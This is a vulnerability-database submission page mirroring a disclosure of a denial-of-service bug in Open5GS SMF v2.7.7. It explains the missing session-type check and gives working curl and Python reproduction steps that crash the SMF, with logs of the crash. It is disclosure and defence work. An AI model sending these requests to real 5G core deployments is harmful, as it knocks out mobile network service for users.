Soumettre #808507: Open5gs SMF v2.7.7 Denial of Serviceinformation

TitreOpen5gs SMF v2.7.7 Denial of Service
Description### Open5GS Release, Revision, or Tag v2.7.7 ### Steps to reproduce ### Description SMF accepts `POST /nsmf-pdusession/v1/vsmf-pdu-session/{smContextRef}/modify` for an ordinary non-home-routed session and later aborts when trying to build the N2 modification message. The server-side route only checks that the `smContextRef` exists: ```c sess = smf_sess_find_by_sm_context_ref( sbi_message.h.resource.component[1]); ... ogs_fsm_dispatch(&sess->sm, e); ``` There is no precondition that the target session is actually a V-SMF home-routed session. Inside `smf_nsmf_handle_update_data_in_vsmf()`, the request populates `sess->h_smf_qos_flows_add_mod_request_list` and then unconditionally calls: ```c param.n2smbuf = ngap_build_pdu_session_resource_modify_request_transfer(sess, qosFlowProfile->gbr_qos_flow_info ? true : false); ogs_assert(param.n2smbuf); ``` But `ngap_build_pdu_session_resource_modify_request_transfer()` switches on `HOME_ROUTED_ROAMING_IN_VSMF(sess)`. For a normal non-HR session that is `false`, so it ignores the supplied V-SMF list and instead iterates `sess->qos_flow_to_modify_list`, which is empty in this path. ASN.1 encoding then fails and `param.n2smbuf` stays `NULL`, triggering a fatal assertion. This issue is distinct from the separate `missing qosFlowProfile` report. Here the request includes a valid `qosFlowProfile`, but the route still aborts because the handler is reachable on a session type it was not designed for. ### Steps to reproduce 1. Start the Open5GS Docker lab and establish a normal SMF session using the existing UERANSIM containers: ```bash docker restart smf-audit-ue docker logs --tail 30 smf-audit-ue ``` Wait until the UE log shows: ```text PDU Session establishment is successful PSI[1] ``` 2. Identify the active `smContextRef`. In this run it was `1`: ```bash for id in 1 2 3 4 5 6; do code=$(curl --http2-prior-knowledge -m 3 -s -o /tmp/out.$$ -w '%{http_code}' \ -X POST http://10.33.33.10/nsmf-callback/v1/sm-policy-notify/${id}/update \ -H 'content-type: application/json' \ --data '{"smPolicyDecision":{}}') printf '%s %s\n' "$id" "$code" done ``` 3. Send a `vsmf-pdu-session` modify request with a syntactically valid `qosFlowProfile`: ```bash payload=$(python3 - <<'PY' import json body = { "requestIndication": "NW_REQ_PDU_SES_MOD", "qosFlowsAddModRequestList": [ { "qfi": 1, "qosFlowDescription": "permit out ip from 10.0.0.1 1000 to any", "qosFlowProfile": { "5qi": 1, "arp": { "priorityLevel": 1, "preemptCap": "NOT_PREEMPT", "preemptVuln": "NOT_PREEMPTABLE" } } } ] } print(json.dumps(body, separators=(",", ":"))) PY ) curl --http2-prior-knowledge -m 5 -sS -i \ -X POST http://10.33.33.10/nsmf-pdusession/v1/vsmf-pdu-session/1/modify \ -H 'content-type: application/json' \ --data "$payload" ``` 4. Check SMF state and logs: ```bash docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' smf docker logs --since 2026-04-10T21:02:06Z smf ``` ### Logs ```shell curl: (92) HTTP/2 stream 1 was not closed cleanly before end of the underlying stream exited 139 2026-04-10T21:02:16.719914951Z 04/10 21:02:16.629: [core] ERROR: Failed to encode ASN-PDU [-1] (../lib/asn1c/util/message.c:42) 04/10 21:02:16.629: [smf] FATAL: smf_nsmf_handle_update_data_in_vsmf: Assertion `param.n2smbuf' failed. (../src/smf/nsmf-handler.c:2539) ``` ### Expected behaviour SMF should reject `vsmf-pdu-session` requests for non-home-routed sessions with a normal HTTP error response. ### Observed Behaviour The request drives the SMF into an ASN.1 build failure and the process exits with code `139`. ### eNodeB/gNodeB Not required. ### UE Models and versions Not required.
La source⚠️ https://github.com/open5gs/open5gs/issues/4454
Utilisateur
 LinJu (UID 97503)
Soumission20/04/2026 21:47 (il y a 1 mois)
Modérer11/05/2026 10:02 (21 days later)
StatutAccepté
Entrée VulDB362587 [Open5GS jusqu’à 2.7.7 SMF /src/smf/nsmf-handler.c smf_nsmf_handle_update_data_in_vsmf déni de service]
Points20

PrécédentAperçuSuivant

Do you want to use VulDB in your project?

Use the official API to access entries easily!